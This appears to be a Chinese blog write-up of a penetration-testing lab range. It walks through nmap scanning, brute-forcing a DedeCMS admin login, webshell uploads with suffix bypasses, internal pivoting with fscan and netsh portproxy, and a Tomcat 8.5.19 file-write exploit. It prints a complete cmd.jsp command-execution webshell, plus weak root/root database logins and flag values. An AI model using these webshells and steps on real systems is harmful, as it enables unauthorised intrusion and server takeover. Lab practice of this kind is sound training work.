渗透复现

初步接触

先进行主机发现

nmap 172.16.17.0/24 -p 80 先指定扫描80端口的

e2b9f2879da84fde9d08c3ddd0bc3f75.png

nmap 172.16.17.0/24

做的时候,一直没有发现之间有一个输入成了逗号

bb58d7abf99a4057b26f66144c9fc780.png

 从上面的结果我们就可以看到两台机器

134的只有开放了80和3306端口

而177的开放了许多端口,说明可以利用的很多

f21fd7276f3648d9bed0cb3e437f8955.png

根据上面的结果,就可以知道了

我们会看到有几个open,应该就是这两个了

79eacb8f7e784cdcbcedd4cffea7d4d9.pngb6bd53923b4d410db5a8339def4fcd59.png

就会发现是可以的,然后访问看看

177是可以访问的

6afb7a6f76d64bc7b51441e6e436cf98.png

 网上关于织梦的cms的漏洞还是有许多的

SQL 注入漏洞、文件包含漏洞、 XSS 漏洞、 CSRF 漏洞、文件上传漏洞、未授权访问漏洞、安
全性设置不当漏洞

134出现异常,做的时候以为是一个错的后面就没有想利用了

就先看177的,回到页面,看到底部有一个关键的信息,搜一下看看,加上dede就会发现后台管理页面

9730b60950804cc8bfecba63df84a13b.png

抓包爆破一下,就会看到密码是1q2w3e4r 登陆成功

0c3595dab4a7435ca65c89b1fc373359.png

做题的时候sha了 ,没有发现这个答案....

会员中心--内容中心--个人空间--文章发表下,发现了文件上传漏洞

打开会员中心之后,把会员功能打开,找到图像就可以发现上传点了

aaf4b0039a614f168290f4810042e798.png

b30bd96c419d422793d0cc858fd4abf1.png

上传个一句话木马文件上去

发现不可以

其他师傅说需要改后缀

上传一个图片马,用bp抓包,改后缀为p*hp

copy 1.jpg/b+1.php/a 2.jpg

1ada781671124695b0a99daf7875bdae.png

成功回显路径,然后连接不成功,等一下再来看看

在后面做的过程中也会发现还有其他的上传点

进入后台后,在附件管理有上传点,可以任意上传文件

还有一个就是在模块管理中的上传模块也是可以的,

在附件管理的那里我们上传一句话木马也是可以getshell的,路径是在upload下

在核心的文件式管理器上也发现了,试了一下居然可以成功

bcc1b150a2aa4735b6cfbd6227e04a72.png

蚁剑连接成功就可以看到flag3了,文件路径.....

C:/phpstudy_pro/WWW/data/common.inc.php

flag3{cf1e8c14e54505f60aa10ceb8d5d8ab3}

ea884ad19ea4485daef3f8f3da6f4cb4.png

织梦数据库配置文件在/data/common.inc.php,这个也是后面才知道的

89d71381bea14f45adb4e470f958d57f.png

20a84bfc54674bf1938b788bca021990.png

然后添加数据,进行连接,连接成功

e907279807c440dbae2abc27d473125c.png

 有一个答案在dede_admin 下

 在添加配置里面输入相应的内容,flag1就会出现了,在dede库的dede_admin表中有flag1bcdde5dd335a45769f410e274f4dbd10.png

这两个都比较难找一点

外网的差不多就结束

进入内网的前提也是要知道ip

获取当前主机的ip

ed8415e6fdf744269bbc52fa95dbf436.png

 是什么权限,我们用whoami命令

946fd6b6f8da4b19a89438bccfe616a2.png

直接就是管理员权限,不需要我们提权

ipconfig

8b95db3ceb68449f97eebe27b600ec19.png

上传 fscan.exe

找到内网ip192.168.31.20

ae4901fe963c46b8aaf32f26ad19af8c.png

 右键终端中输入命令

-fscan64 -h 192.168.31.20/24

ef47b3d1c27f4823b7d0256ecb3bf7b5.png

 说明存在内网靶机192.16.31.131

端口转发一下

netsh interface portproxy add v4tov4 listenport=88   connectaddress=192.168.31.131 connectport=80

查看是否设置成功

netsh interface portproxy show all

端口设置成功
0f503dc7af54468b863f07bf56863ce2.png

 访问88这个端口,访问成功

e4a56f18ae054d428f8cd2e6c6e3af17.png

 Apache Tomcat/8.5.19,直接搜漏洞

88/manger

8b1e519b8b28414a8b64ca65b032114a.png

 被拒绝了

一文了解Tomcat/8.5.19文件上传漏洞复现_tomcat8.5漏洞-CSDN博客

【Tomcat-8.5.19】文件写入漏洞_apache tomcat/8.5.19_夭-夜的博客-CSDN博客

上传jsp一句话木马


<%@ page import="java.util.*,java.io.*"%>
<%
//
// JSP_KIT
//
// cmd.jsp = Command Execution (unix)
//
// by: Unknown
// modified: 27/06/2003
//
%>
<HTML><BODY>
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
<%
if (request.getParameter("cmd") != null) {
        out.println("Command: " + request.getParameter("cmd") + "<BR>");
        Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
        OutputStream os = p.getOutputStream();
        InputStream in = p.getInputStream();
        DataInputStream dis = new DataInputStream(in);
        String disr = dis.readLine();
        while ( disr != null ) {
                out.println(disr);
                disr = dis.readLine();
                }
        }
%>
</pre>
</BODY></HTML>

刷新抓包加上以上的东西,再修改一下

2db1536921a348ab953fcc192c511590.png

上传成功

87dc0ab78b194389bf10cd349e34ee9e.png

  ls /

 dd34ba384d254fb49d220852d011cd08.png

 a4ba21a6dd1c4733a9ce95299f651f16.png

flag11{8f72e28063c30c7468fb6af4653f4f9c}

 再访问另外一个端口

b7cab62c9f1d48dfa41d48bb04f859f0.png

 【漏洞复现】CVE-2023-28432 MinIO集群模式信息泄露漏洞_minio漏洞-CSDN博客

 照着来了一下,结果...

需要改一下端口

netsh interface portproxy add v4tov4 listenport=7777  connectaddress=192.168.31.131 connectport=9001

bc2d6bf3775b407793a8c96f2c64995c.png

 然后还是访问不行

记得之前还有一个ip   172.16.17.134

用dirsearch扫一下看看

5fb748bd5aef4bf29ceb8f85359c6281.png

发现了一些文件,但是和windows上扫出来的结果有点不一样,有个l.php漏了

f34516dee75c4981acbfdacf0bafef60.png

底部有一个mysql连接

 e389ac7acd1d408795a67ee3c94100cd.png

 弱口令root/rootbfeca302cfbd480dbc045d74383e8671.png

 刚刚扫的时候还发现/phpMyAdmin/,访问一下看看

55b7f78b06cd443387138f880e872cea.png

 root/root    成功进入aa77acad53634d598715a16a413d9af4.png

 0693e3dbd5b945648e58e619f1942e93.png

 又是在页面上

在数据库中发现了

706b06e7f3764d05bcfe2dd572a68cf9.png

 还有一个shell.php,访问看看,出现了一堆东西

e1c1dc1bb8114b378bd8eb2620b7cc82.png

 b66dd60992764202b45bb85b362bfe27.png

 感觉像是一些查询语句

newyxcms出现较多,搜索看看,真的挺多的

d3060a108b684aee82b028a42d18e424.png

 万万没有想到还有个yxcms的目录,没有想到和这个居然有联系

58c878a1d92c4e9bb0426b700f3819ca.png

 小心网站页面,应该还会有信息,果然

210dc44a053946bf84d12f5db86af0d3.png

 注意要是改成admin,才能输入

 6c72d1bd6b8840ccad8efd70209c1e51.png

 ss 一下

 f2abd11da6b7446c9485c9279e6ca9d8.png

 bdeeb37d1b39458c89e62a0ea847c055.png

 提示说上传的文件会在default的文件夹下

不知道路径,御剑扫一下

ee3e15f5527946cc918d3288c96dc777.png

 网站下面有个beifen.rar,访问就可以下载

b40ea84dce7445e585bbf56a870f5ec2.png

 文件上传的路径点在\yxcms\protected\apps\default\view\default

26c925fe84494a21b4156e10bf372294.png

 上传成功

7d7e2c473c3049f7a67c4f0f62c23d17.png

 蚁剑连接成功

 2bdd2153cace4e9c801942c6c4a25a46.png

 在以下路径发现答案

 9f0ae0230fa24b21b6600d022959b24f.png

  • 48
    点赞
  • 39
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值